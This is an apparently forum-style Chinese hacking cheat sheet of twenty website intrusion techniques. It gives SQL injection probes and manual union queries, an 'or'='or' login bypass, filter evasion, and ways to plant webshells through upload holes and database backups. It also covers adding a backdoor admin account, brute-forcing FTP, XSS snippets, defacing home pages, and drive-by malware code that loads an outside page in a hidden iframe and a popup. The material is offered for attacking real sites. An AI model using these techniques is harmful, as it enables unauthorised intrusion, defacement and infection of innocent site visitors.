1,〓經典注入〓
? ? 通常,判斷一個網站是否存在注入點,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1
,%20and%201=2,來判斷,
如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那么就存在注入點
? ? 2,〓萬能密碼OR漏洞〓
? ? 萬能密碼'or'='or',可以用在后臺管理輸入,有的網站由于沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞
存在于ASP類型的網站
? 3,〓爆庫〓
? 爆庫,可以理解為爆出數據庫下載,用爆庫之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進制的
\符號,而數據庫大于5.0
就可以進行爆庫,如在PHP手工高級注入時,用VERSION()這個變量猜出網站數據庫版本,如果一個網站數據
庫大于5.0,且是ACESS
數據庫,那么提交地址是:http://www.520jsj.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因為
%5C是爆二級目錄,所以
應該是這樣,http://www.520jsj.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非
法下載數據庫,而把數據
庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我
們把%23加到替換#
,http://www.xx.com/rpd/%23database.mdb
4,〓COOKIE中轉,SQL防注入程序,提醒你IP已被記錄〓
COOKIE中轉,SQL防注入,如果檢測一個網站時,彈出這樣一個對話框,上面出現SQL防注入程序提醒的字
語,那么我們可以利用
COOKIE中轉,注入中轉來突破,方法是先搭建一個ASP環境(且網站為ASP網站),然后打開中轉工具,記
住一個網站的頁面地址
粘貼進工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來,打開網頁,輸入http://127.0.
0.1端口)/目錄里文
件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了
5, 〓手工〓
ASP手工語句? 表名 and exists (select * from 表名)
? ? ? ? ? ? ? ? ? ? ? ? ? ? 列名 and (select count(列名) from 表名)>0
? ? ? ? ? ? ? ? ? ? ? ? ? ? 長度 and (select top 1 len(username) from admin)>0
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 內容 and (select top 1 asc(mid(username,1,1)) from admin)>100
PHP手工語句:order by(猜字段),and 1=2 union select (字段數)and 1=2 union selsect from(位置)
如果有30個字段,那么就應該在注入地址后輸入http://www.520jsj.com/showfo.jsp?id=130 and 1=2 union
select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
幾個常用變量 ,USER(),VERSION()<數據庫版本),database()<數據庫名稱>
6,〓抓包拿WEBSHELL〓
如果進入后臺發現,點數據庫備份的時候發現找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具
WOSCK抓包,一張圖片
,一個ASP馬,自行搭建一個上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )
7,〓數據庫備份拿WEBSHELL和一句話木馬入侵〓
通常進入后臺了,發現有數據庫備份,拿WEBSHELL吧,找一個添加產品的地方,傳一個大馬,格式為
JPG圖片,然后把圖片地址
粘貼到數據庫備份那里,給起個名字,如SHELL.ASP,然后合地址訪問的時候就進入webshell了,一句話
木馬入侵,先編輯記事本,
加入一句話,改為2.jpg,然后備份,訪問,發現500內部服務器錯誤,證明一句話成功,接下來用一句話
木馬客戶端連接,得到路徑
頁面,然后改下馬名,輸入大馬內容,提交,得到WEBSHELL
8,〓DB權限差異備份拿WEBSHELL〓
如果一個網站注入點是MYSQL數據庫,且是DB權限,或者是SA權限,能夠列目錄,那么就好辦了,找
到網站的目錄,目錄通常在
D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功后,再輸入大馬內容,拿
到WEBSHELL
9,〓找后臺〓
找后臺,一般默認為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp
,login.asp,logon,user.asp,
admin/index.asp,當然,這只是默認,一些大網站不可能還用admin作為后臺,有的隱藏很深,可以簡單
用site:網站 inurl:后臺
來猜,或者下載源HTML文件分析找出后臺,或者用各種工具來掃描了,方法很多的
10,〓腳本提示〓
有的網站要求進入后臺會出現一個腳本提示,就像VB編程里INPUTBOX “”,一個對話輸入框,我們輸入
administrator突破,
admin代表以管理員身份來進入
11,〓php后門和EWEBEDITOR編輯器入侵〓
PHP后門,如之前爆出的DISZ漏洞,在一個PHP網站后面加C.PHP,如果出現1,那么傳個PHP馬就拿到
WEBSHELL,
EWEBEDITOR編輯器入侵,是很快速的方式,設置好上傳文件類型,傳ASA,或者其他的格式,然后
訪問拿到WEBSHELL
,如沒有直接加語句拿到WEBSHELL
12,〓上傳漏洞〓
有的網站雖然沒有注入點,但存在一個上傳漏洞,那么我們如何來利用了,首先,打開上傳地址看是
否存在,如果有,試想傳一個ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來上傳,動網,
動力,動感,喬客4種方式,頁面地址格式要對應,如果一個網站地址彈出對話框,顯示上傳成功,那么證明可以拿到
WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那么可以構建兩個上傳,第一個傳JPG的圖片,第二個傳ASP
馬(大馬),記住,大馬后面要有個空格才行,如果一個網站地址出現文件類型不正確,請重新上傳,那么證明%90可
以拿到WEBSHELL,只是格式不對,不允許,改后綴,只要是網站沒有過濾的格式,如果一個網站地址顯示請登陸再
上傳,那么證明沒有拿到COOKIS,思路是在該網站注冊一個用戶,得到COOKIS,然后上傳就成功了
13,〓簡單提權拿下服務器和SERV提權和pcanywhere三方提權〓
簡單拿下服務器,也就是拿下網站IP主機,首先我們需要一個WEBSHELL,然后看看組件信息,
看看路徑可讀可以寫不,如果有一個可以,那么來到CMD命令下,首先輸入可寫的文件內容,執行命令加一個
帳號和最高管理權限,然后輸入netstat -an,得到主機連接端口,然后用3389連接進入,讓其成為肉雞(最好),這
樣比較隱蔽我們操作
14,〓反查入侵和旁注和社會工程學〓
反查IP入侵,也就是入侵21,端口,首先我們入侵網站先PING WWW.520jsj.com ,出IP,然后到反
查IP站點查掛了多少個域名,接下來,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,
321,456),然后用流光探測密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會工程學X-WAY,來得到FTP
密碼,也需要收集,并不是每個都行,總之是自己的經驗
15,〓跨站腳本攻擊〓
跨站(CSS),被動攻擊,現在需要更多的思路和經驗了
三段經典跨站代碼
<script>alert("跨站開始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.baidu.com)</script>
16〓特殊空格〓
利用TAB制作的特殊空格,然后注冊時輸入空格,加管理名字,隨便在網站上找個斑竹,或者管理
的名字,這樣來注冊,有時自己注冊的這個也會變成管理員
17,〓改主頁〓
改主頁,拿到WEBSHELL后,先找出首頁文件,一般為index.asp,index.php.index.jsp,index.html,
然后來到站點根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁代碼(黑頁),保存,再訪
問時已經變成自己想要的結果了
18,〓掛馬〓
首先在WEBSHELL里,建立一個文本,改為1.htm,接下來在主頁最下面掛
兩段經典掛馬代碼
<html>
<iframe src="http://www.x520jsj.com/2.htm" width="0" height="0" frameborder="0"></iframe>
</html>
<SCRIPT language=javascript>? ? ? ?
window.open("http://www.520jsj.com/2.htm","","toolbar=no,location=no,directories=no,status=
no,menubar=no,scrollbars=no,width=1,height=1");?
</script>
19 〓 GOOGLE BACK語句〓(很多)
inurl:asp?id=? ? ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=
20,〓自尋漏洞〓
自己根據自己的技術經驗和積累